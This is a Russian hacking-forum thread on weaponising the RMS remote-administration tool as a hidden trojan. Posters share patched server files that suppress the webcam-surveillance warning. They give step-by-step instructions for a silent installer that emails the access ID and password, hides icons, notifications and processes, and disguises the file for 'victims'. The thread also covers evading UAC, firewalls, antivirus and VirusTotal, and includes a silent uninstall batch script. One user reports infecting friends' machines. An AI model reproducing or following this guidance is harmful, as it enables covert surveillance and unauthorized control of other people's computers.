RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. airstrike
    airstrike Новичок
    Симпатии:
    1
    Сорри)) вот щас залил патч для rms.5.1.2b3
    http://webfile.ru/5922138

20 апр 2012
  2. vlader
    vlader Guest
    airstrike, там у тебя 5.1.3. А ведь beta3 нет. Самая последняя версия - beta2.

21 апр 2012
  3. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    Что то я читал всю тему и нечего не понял должно быть 4 файла

Код:
    Изначально для этого нам понадобятся 4 файла:
    1. rms.viewer5.1b1ru (клиент RMS)
    2. rms.server5.1b1ru (сервер RMS)
    3. setup.exe (само удаляющийся архив)
    4. install.bat

Вы же выкладываете какие то там пачи непонятные или ещё что то (2 файла клинет и сервер) и что с ними делать?

Кто нить можите скинуть изначальную версию чтобы делать всё как по инструкции а то непонятно

21 апр 2012
  4. scandalist
    scandalist Новичок
    Симпатии:
    3
    Патченный сервер 5.1.2.0 Тыц
    nopass

Добавлено через 12 минут
    Плохо читали. Первые два файла, это оригинальные инсталляторы сервера и вьювера, их можно скачать с официального сайта. Последние два файла, это командный файл установщика и 7z самораспаковывающийся архив с функцией самоудаления.
    Изначально, программа RMS, хоть и имеет режим скрытой работы, не является вирусом-трояном. Поэтому, при подключении вебкамеры она отображает на экране жертвы сообщение "Ведется скрытое наблюдение!" Все наивные запросы об отключении этой функции на официальном форуме программы посылаются нах... Выкладываемые здесь "патченные" файлы сервера свободны от указанного недостатка. При сборке собственного инсталлятора, следует подменять оригинальные файлы сервера исправленными. Также можно подменить указанные файлы на уже работающем сервере, процедуру здесь описывали. Для каждой версии сервера надо делать отдельное исправление файлов. Сделав побайтовое сравнение оригинального и исправленного файла, можно убедиться, что они отличаются на один байт.
    К тому же, подготовка MSI инсталлятора требует некоторых усилий по маскировке.
    P. S. Не заморачивайтесь, а скачайте готовую сборку от vlader, несколькими сообщениями выше.

Последнее редактирование: 21 апр 2012
    21 апр 2012
  5. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    scandalist,
    Ну вот дапустим скачал я сборку от vlader, что дальше ?
    там 2 файла .exe и .msi
    В.exe там 1 файл install.cmd
    а во втором непонятно что и как мне настроить это под себя?

21 апр 2012
  6. scandalist
    scandalist Новичок
    Симпатии:
    3
    Пошаговое руководство:
    - Качаем RMS 5.3.1.b2 в комплекте. Надеюсь, все понимают, что скачивать следует актуальные версии вьювера и пересобранного сервера. Соответственно с официального сайта и из этой ветки.
    - Вьювер устанавливаем на свою машину.
    - Запускаем вьювер, получаем себе бесплатный код лицензии.
    - Через пункт меню "Удаленная установка/MSI конфигуратор" открываем скачанный файл установщика сервера RMSbla-bla-bla.msi
    - Тип дистрибутива выбираем "Стандартный" (первый пункт).
    - Делаем необходимые настройки, отключаем создание ярлыков, включаем генерацию InternetID и пароля. Вводим email, на который будет отправляться эта информация. Email лучше сделать отдельный, чтобы не подставляться.
    - Жмем кнопку "конфигурировать", делаем необходимые настройки, добавляем на сервер лицензию, убираем всё что может нас скомпроментировать: иконку в трее, оповещения пользователя, меняем порт по умолчанию, снимаем галку IPv6 и т.д., закрываем окно конфигурирования сервера, получаем на выходе новый RMSbla-bla-bla.msi (он перезаписывается поверх исходного, с тем же именем), файл установщика настроенный под себя, тут не торопимся, создание файла занимает некоторое время, контролируем по дате и времени изменения файла.
    - Качаем этот архив, распаковываем в любую папку.
    - Кладем готовый, сконфигурированный сервер переименованный нами в rms.msi в нашу папку "self install" запускаем файл make_installer.cmd через пару секунд получаем rms-id.exe, тихий как мышка. Надо только сменить иконку редактором ресурсов.
    - Устанавливаем последнюю версию вьювера поверх старой.
    - Впариваем файл жертве. При запуске этого файла, сервер будет установлен в папку C:\Windows\System32\sysfiles и запущен, а на мыло придет письмо с InternetID.
    Если необходимо выполнить обновление уже установленного сервера то:
    - Подключаемся к серверу в режиме передачи файлов, в папке установки переименовываем .exe файлы и копируем туда файлы сервера rutserv.exe и rfusclient.exe из новой версии сервера. Дожидаемся перезагрузки удаленного компьютера, потом старые переименованные файлы удаляем.
    После подключения, неплохо бы проверить лицензию на сервере и если что отправить код, а то через 30 дней сервер перестанет работать.

В любом случае, рекомендую предварительно потренироваться на кошках. Запустить файл на виртуальной машине. И посмотреть как всё работает.

На что можно натолкнуться:
    - Если пользователь должен сам запускать файл установщика, а тот ничего не делает, то он может заподозрить неладное. (прикрепляем к инсталлятору что-нибудь "полезное": помещаем в архив программку и дописываем её запуск в install.cmd)
    - Если у пользователя настроен UAC (запрос, который каждый раз появляется при внесении изменений в систему) то может вылезти предупреждение. (как повезёт)
    - Если имеется файерволл aka брандмауэр, то он запалит попытку сервера выйти в сеть. (если файерволл виндоусовский, то он обходится автоматом, если нет то увы)
    - Параноидальный антивирус может распознать сервер как опасную или подозрительную программу и нажаловаться пользователю. (Пока вроде никто не распознает)
    - rutserv.exe и rfusclient.exe видно в диспетчере задач и если пользователь продвинутый то может заподозрить неладное. (надо принимать дополнительные меры по скрытию процесса или переименовать его)
    Хацкеры и лица, им сочувствующие! Ни в коем случае не проверяйте готовые сборки или элементы программ на VirusTotal. Это всё равно, что партизанские явки в гестапо проверять!

Последнее редактирование: 20 янв 2013
    21 апр 2012
  7. vlader
    vlader Guest
    Качаем вьювер (в архиве сервер и вьювер, сервер вам не нужен) с офф. сайта, устанавливаем. В меню вьювера выбираем Удалённая установка > MSI конфигуратор. Делаешь по картинке,
    настраиваешь сервер, msi файл кидаешь в папку arch, запускаешь make_installer.cmd, в папке появится твой exe файл.

Добавлено через 1 минуту
    Ой, до меня уже написали. scandalist, да, ты всё правильно написал.

Последнее редактирование модератором: 21 апр 2012
    21 апр 2012
  8. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    vlader,
    Всё теперь всё ясно , щас попробую
    ТОка вот жму Конфигурация и пишет "Файл "бла бла" неявляеться актуальным дистрибутивом"

21 апр 2012
  9. scandalist
    scandalist Новичок
    Симпатии:
    3
    Смотри в пункте "о программе" Вьювера версия 5.1.3b2 должно быть сервер именно от неё.
    Последняя версия у них не в разделе Download лежит а на форуме в теме бета тестирование 5.1.3

21 апр 2012
    1 человеку нравится это.
  10. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    scandalist,
    Ещё раз спасибо у меня была версия 5.1.2
    щас буду настраивать

Добавлено через 20 минут
    Ну вот типо настроил нечего почти не трогал кинул другу он запустил и высветилось типо установить RMS и так далие ну он нажал да , дальше показало табличку что установлено но мне на почту не пришло нечего

21 апр 2012
  11. scandalist
    scandalist Новичок
    Симпатии:
    3
    vlader
    При запуске пакета спрашивает хочу ли я установить Remote Admin? ;)
    А в конце сообщает об успешной установке.
    Письмо отправляет без окна подтверждения.
    Баннера камеры нет.
    Надо что-то другое делать. Например создавать не .msi а .exe пакет в нем можно отключить оповещение пользователя.

Решение найдено:
    Качаем этот архив распаковываем в любую папку.
    Подготавливаем Вьювером наш rms.msi убираем всё что может нас скомпроментировать, иконки, оповещения, меняем порт, снимаем IPv6 и т.д.
    Кладем rms.msi в нашу папку "self install" запускаем файл make_installer.cmd через пару секунд получаем rms.exe, тихий как мышка. Надо только сменить иконку редактором ресурсов.

21 апр 2012
  12. vlader
    vlader Guest
    FamilOff, scandalist, Нужно использовать создание exe файла. Я сейчас перепишу пост выше.

21 апр 2012
  13. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    vlader,
    scandalist,
    Так мне сегодня удастся сделать скрытый RMS ?
    В старенькой статье "http://www.xaker.name/forvb/showthread.php?t=20588&highlight=Remote" было так всё легко а тут непонятно что

21 апр 2012
  14. vlader
    vlader Guest
    FamilOff, перечитай мой пост на преведущей странице.

21 апр 2012
  15. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    vlader,
    Ну сделал так поменял в настройках сервера тока "(Скрывать в меню Остановить сервер РМС)" и при выходе сохранился exe файл я так понел это и есть скрытый рмс ну закинул другу он проверил вроди все прошло тока в конце открылся сайт RMS (http://rmansys.ru/) На почту мне нечего не пришло

21 апр 2012
  16. scandalist
    scandalist Новичок
    Симпатии:
    3
    Не стоит так делать. Там после установки открывается сайт программы.
    Лучше сделать как я написал чуть выше (#724).

Мне на почту приходит всё, что положенно. Не знаю, может спамфильтр удаляет сообщение? Возможно также, что сервер уже ранее устанавливался.
    Письмо приходит только если установленно впервые. Удаляйте сервер прежде чем заново ставить.

Поправил пошаговое руководство здесь

21 апр 2012
  17. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    scandalist,
    Да нет в спаме всё чисто пользуюсь Яндекс почтой
    Сделал как написано в посте "724"
    И нечего не приходит, может я сервер не так настраиваю?
    Я тока в настройках:
    *Убираю "Показывать иконку в трее"
    *Ставлю галочку на "Скрывать в меню "Остановить РМС сервер" "
    * Убираю менять вид иконки
    *И убираю галочку "Использовать IPv6"
    * Ну и в этот раз поменял порт на 5050

Может ещё что надо или что не так?

21 апр 2012
  18. scandalist
    scandalist Новичок
    Симпатии:
    3
    FamilOff,
    Если вы ставите сервер поверх уже установленного, то он сохраняет предыдущие настройки и соответственно ничего не отпраляет.
    Если у него уже был установлен сервер в другую папку, его тоже надо удалить.
    Сервер надо удалять предварительно.
    Код:
    @echo off

"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /stop
    "%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /silentuninstall

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
    MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
    MsiExec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress 
    MsiExec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress 

del /f /q "%SYSTEMROOT%\System32\sysfiles\dsfVorbisDecoder.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\dsfVorbisEncoder.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\gdiplus.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\Microsoft.VC90.CRT.manifest"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\msvcp90.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\msvcr90.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\rfusclient.exe"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\RIPCServer.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\rutserv.exe"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\RWLN.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\vp8decoder.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\vp8encoder.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\oledlg.dll"
    del /f /q "%SYSTEMROOT%\System32\sysfiles\rasadhlp.dll"

rd "%SYSTEMROOT%\System32\sysfiles"

Сохраните это как uninstall.cmd и запускайте на сервере для удаления этот командник только для сервера собранного vlader.
    После удаления сервера в Диспетчере задач процессов rutserv и rfusclient быть не должно.

Последнее редактирование: 7 июн 2012
    21 апр 2012
  19. FamilOff
    FamilOff Новичок
    Симпатии:
    1
    scandalist,
    А всё у другого друга попробовал всё работает

21 апр 2012
  20. vlader
    vlader Guest
    scandalist, не нужно так делать. Первые 2 строчки в install.cmd из RMS.exe удаляют программу, но остаётся запись в реестре. Значит нужно просто добавить одну строку в install.cmd.

Добавлено через 1 час 21 минуту
    Новый архив
    Обновил инструкцию. Всё должно работать.

Последнее редактирование модератором: 21 апр 2012
    21 апр 2012
Статус темы:
Закрыта.
Загрузка...